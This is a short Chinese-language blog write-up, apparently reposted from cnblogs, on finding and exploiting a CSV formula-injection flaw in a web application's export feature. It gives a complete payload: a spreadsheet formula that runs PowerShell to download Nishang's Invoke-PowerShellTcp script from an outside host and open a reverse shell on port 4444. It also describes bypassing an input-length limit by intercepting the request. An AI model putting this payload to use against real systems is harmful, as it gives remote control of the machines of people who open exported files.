CSV 注入实战

oxo1 前言

之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。

oxo2 经过

1、测试漏洞

看到有导出功能,就新建一个用户,随手插入 Payload

img

导出 CSV 文件

img

查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。

img

2、利用漏洞

这里反弹 shell就在本地演示好了. 利用 powershell 来进行反弹。(梦哥教我的,梦哥牛逼)

下载:https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 放到网站上。反弹 shell 命令如下:

=1+cmd|' /C powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://172.16.7.64/Invoke-PowerShellTcp.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress 172.16.7.64 -Port 4444 '!A0

尝试输入 payload ,发现长度限制了

img

发现抓取修改可绕过

img

导出到本地,我这里在虚拟机使用 office 2010 来打开,同时本机监听 4444 端口

img

启用,然后点击

img

此时我们就成功反弹 shell

img

oxo3 结束

总体来说这漏洞有点鸡肋,也就只能骗骗只会点 的人。如果是您,您这么天资聪颖绝对不会中招的。

原文地址:https://www.cnblogs.com/yuyan-sec/p/13038464.html